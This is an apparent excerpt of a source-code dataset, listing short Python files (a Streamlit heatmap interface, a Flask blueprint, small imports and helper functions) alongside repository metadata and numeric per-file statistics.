y_values = st.sidebar.selectbox('Y axis', index=length_of_options, options=dropdown_options)
z_value = st.sidebar.selectbox("Z axis", index=length_of_options, options=dropdown_options)
hist_func = st.sidebar.selectbox('Histogram aggregation function', index=0,
options=['count', 'sum', 'avg', 'min', 'max'])
histnorm = st.sidebar.selectbox('Hist norm', options=[None, 'percent', 'probability', 'density',
'probability density'], index=0)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options, options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row", index=length_of_options, options=dropdown_options, )
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
marginalx = st.sidebar.selectbox("Marginal X", index=2, options=['rug', 'box', None,
'violin', 'histogram'])
marginaly = st.sidebar.selectbox("Marginal Y", index=2, options=['rug', 'box', None,
'violin', 'histogram'])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False], index=1)
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False], index=1)
title = st.sidebar.text_input(label='Title of chart')
plot = px.density_heatmap(data_frame=df, x=x_values, y=y_values,
z=z_value, histfunc=hist_func, histnorm=histnorm,
hover_name=hover_name_value, facet_row=facet_row_value,
facet_col=facet_column_value, log_x=log_x,
log_y=log_y, marginal_y=marginaly, marginal_x=marginalx,
template=template, title=title)
except Exception as e:
print(e)
st.subheader("Chart")
st.plotly_chart(plot)
show_export_format(plot)
| 62.106164 | 126 | 0.584064 | 2,023 | 18,135 | 5.024716 | 0.073653 | 0.100935 | 0.161141 | 0.094442 | 0.829808 | 0.820758 | 0.819183 | 0.815052 | 0.792425 | 0.789769 | 0 | 0.001765 | 0.312655 | 18,135 | 291 | 127 | 62.319588 | 0.813718 | 0.110174 | 0 | 0.675926 | 0 | 0 | 0.107958 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00463 | false | 0 | 0.013889 | 0 | 0.018519 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
52262f866b60d480e5f9f7028ca59ba83273c0c8 | 98 | py | Python | background/Estore/User/__init__.py | skypeee/Flask-Estore | 5f9f4a4508680cec44dc4beee308859ee274e23e | [
"MIT"
] | null | null | null | background/Estore/User/__init__.py | skypeee/Flask-Estore | 5f9f4a4508680cec44dc4beee308859ee274e23e | [
"MIT"
] | null | null | null | background/Estore/User/__init__.py | skypeee/Flask-Estore | 5f9f4a4508680cec44dc4beee308859ee274e23e | [
"MIT"
] | null | null | null | from flask.blueprints import Blueprint
user = Blueprint('User', __name__)
from User import views | 19.6 | 38 | 0.795918 | 13 | 98 | 5.692308 | 0.615385 | 0.351351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132653 | 98 | 5 | 39 | 19.6 | 0.870588 | 0 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
5239f1e42289a7b45427f7febbcde08de4725ea6 | 109 | py | Python | main.py | Adi-K-Coding/Tri3-Adi | 62a8b207fa9dbcdf7e2782de03681f87a90ad7f6 | [
"MIT"
] | null | null | null | main.py | Adi-K-Coding/Tri3-Adi | 62a8b207fa9dbcdf7e2782de03681f87a90ad7f6 | [
"MIT"
] | 4 | 2022-03-14T19:38:35.000Z | 2022-03-28T19:40:27.000Z | main.py | Adi-K-Coding/Tri3-Adi | 62a8b207fa9dbcdf7e2782de03681f87a90ad7f6 | [
"MIT"
] | null | null | null | def my_info():
print("My name is Adi, and I'm a tenth grader at Del Norte High school. ")
print(" ")
| 27.25 | 78 | 0.623853 | 20 | 109 | 3.35 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.247706 | 109 | 3 | 79 | 36.333333 | 0.817073 | 0 | 0 | 0 | 0 | 0 | 0.605505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
5258db459149450d7766f5ab39dcd24846ee4c18 | 33 | py | Python | monoweb/wsgi.py | ragnraok/MonoReader | 4672f5f0ca48f69e9180b33b62e773ab323c2cbc | [
"MIT"
] | 1 | 2019-06-12T01:46:22.000Z | 2019-06-12T01:46:22.000Z | monoweb/wsgi.py | ragnraok/MonoReader | 4672f5f0ca48f69e9180b33b62e773ab323c2cbc | [
"MIT"
] | null | null | null | monoweb/wsgi.py | ragnraok/MonoReader | 4672f5f0ca48f69e9180b33b62e773ab323c2cbc | [
"MIT"
] | null | null | null | from mono import mono_app as app
| 16.5 | 32 | 0.818182 | 7 | 33 | 3.714286 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 33 | 1 | 33 | 33 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
52723b66d10a621c38550992a15ade5aba60b121 | 32 | py | Python | rls/nn/modules/__init__.py | StepNeverStop/RLs | 25cc97c96cbb19fe859c9387b7547cbada2c89f2 | [
"Apache-2.0"
] | 371 | 2019-04-26T00:37:33.000Z | 2022-03-31T07:33:12.000Z | rls/nn/modules/__init__.py | BlueFisher/RLs | 25cc97c96cbb19fe859c9387b7547cbada2c89f2 | [
"Apache-2.0"
] | 47 | 2019-07-21T11:51:57.000Z | 2021-08-31T08:45:22.000Z | rls/nn/modules/__init__.py | BlueFisher/RLs | 25cc97c96cbb19fe859c9387b7547cbada2c89f2 | [
"Apache-2.0"
] | 102 | 2019-06-29T13:11:15.000Z | 2022-03-28T13:51:04.000Z | from .icm import CuriosityModel
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bfeb208f8644390bc0ef38b6f6057a55d1e11fe4 | 150 | py | Python | pages/index.py | gabssanto/pizzaPy | e1fb6a1b7f4c25208a9500907913484746c22c38 | [
"MIT"
] | null | null | null | pages/index.py | gabssanto/pizzaPy | e1fb6a1b7f4c25208a9500907913484746c22c38 | [
"MIT"
] | null | null | null | pages/index.py | gabssanto/pizzaPy | e1fb6a1b7f4c25208a9500907913484746c22c38 | [
"MIT"
] | null | null | null |
from core.components.div import Div
def indexPage():
return Div(className="container", children=[
'hello', Div(children=['world'])]) | 25 | 48 | 0.653333 | 17 | 150 | 5.764706 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186667 | 150 | 6 | 49 | 25 | 0.803279 | 0 | 0 | 0 | 0 | 0 | 0.126667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.